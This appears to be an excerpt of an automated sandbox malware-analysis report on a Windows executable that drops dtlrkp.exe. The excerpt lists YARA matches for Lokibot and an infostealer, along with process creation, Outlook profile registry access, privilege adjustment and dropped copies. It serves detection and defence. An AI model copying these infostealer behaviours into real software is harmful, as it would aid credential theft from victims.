              Source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_00406BFE
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 1_2_008A0A33
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_0040549C
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_004029D4
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: String function: 00405B6F appears 42 times
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dtlrkp.exe 57616ECF2F2355F4BCBA77C0A01B6081F7C24CBED9658BB79CC42BA19BD13EF0
              Source: vNcHHC1HKe.exeVirustotal: Detection: 32%
              Source: vNcHHC1HKe.exeReversingLabs: Detection: 47%
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeFile read: C:\Users\user\Desktop\vNcHHC1HKe.exeJump to behavior
              Source: vNcHHC1HKe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\vNcHHC1HKe.exe "C:\Users\user\Desktop\vNcHHC1HKe.exe"
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeProcess created: C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess created: C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeProcess created: C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess created: C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeFile created: C:\Users\user\AppData\Local\Temp\nsxB1C1.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/6@0/1
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_004021AA CoCreateInstance,
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: vNcHHC1HKe.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: wntdll.pdbUGP source: dtlrkp.exe, 00000001.00000003.371082188.00000000020A0000.00000004.00001000.00020000.00000000.sdmp, dtlrkp.exe, 00000001.00000003.378532429.0000000002230000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: dtlrkp.exe, 00000001.00000003.371082188.00000000020A0000.00000004.00001000.00020000.00000000.sdmp, dtlrkp.exe, 00000001.00000003.378532429.0000000002230000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.dtlrkp.exe.8b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dtlrkp.exe PID: 7032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dtlrkp.exe PID: 7056, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_00402AC0 push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeFile created: C:\Users\user\AppData\Local\Temp\dtlrkp.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeFile created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeProcess information set: NOGPFAULTERRORBOX
